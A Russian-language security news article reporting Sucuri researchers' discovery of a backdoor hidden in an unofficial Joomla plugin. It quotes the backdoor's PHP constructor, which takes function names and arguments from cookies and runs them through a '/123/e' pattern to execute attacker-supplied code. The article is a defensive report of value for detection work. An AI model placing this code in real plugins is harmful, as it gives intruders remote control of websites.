В плагине Joomla обнаружили бэкдор, замаскированный под легитимный код

image

Теги: бэкдор, Joomla, исследование

По данным экспертов, упустить наличие бреши могут как администраторы, так и решения безопасности.

Как сообщают исследователи безопасности в официальном блоге компании Sucuri, им удалось выявить «интересный бэкдор» в неофициальном плагине для платформы Joomla.

По словам специалистов, все было настолько хорошо продумано, что поначалу они не смогли понять, что имеют дело с бэкдором. Для наглядности эксперты предоставили код упомянутого дополнения:

«На первый взгляд ничего подозрительного. Ничего не зашифровано, не запутано и нет излишних комментариев. Самый обычный код для плагина Joomla, - отмечают в Sucuri. – Однако если вы посмотрите немного внимательней, то заметите, что конструктор класса не так уж и безобиден».

public function __construct() {
 $filter = JRequest::getString('p3', Null, 'cookie');
 if ($filter) {
 $option = $filter(JRequest::getString('p2', Null, 'cookie'));
 $auth = $filter(JRequest::getString('p1', Null, 'cookie'));
 $option("/123/e",$auth,123);
 die();
 }
 }

Исследователи подчеркивают, что не заметить уязвимость при просмотре кода довольно легко. Более того, упустить ее могут и многие сканеры безопасности, однако надежным методом противостояния подобным угрозам является использование инструментов по контролю целостности кода.

Ознакомиться с отчетом можно  здесь .

Telegram Подписывайтесь на канал "SecurityLab" в Telegram, чтобы первыми узнавать о новостях и эксклюзивных материалах по информационной безопасности.

comments powered by Disqus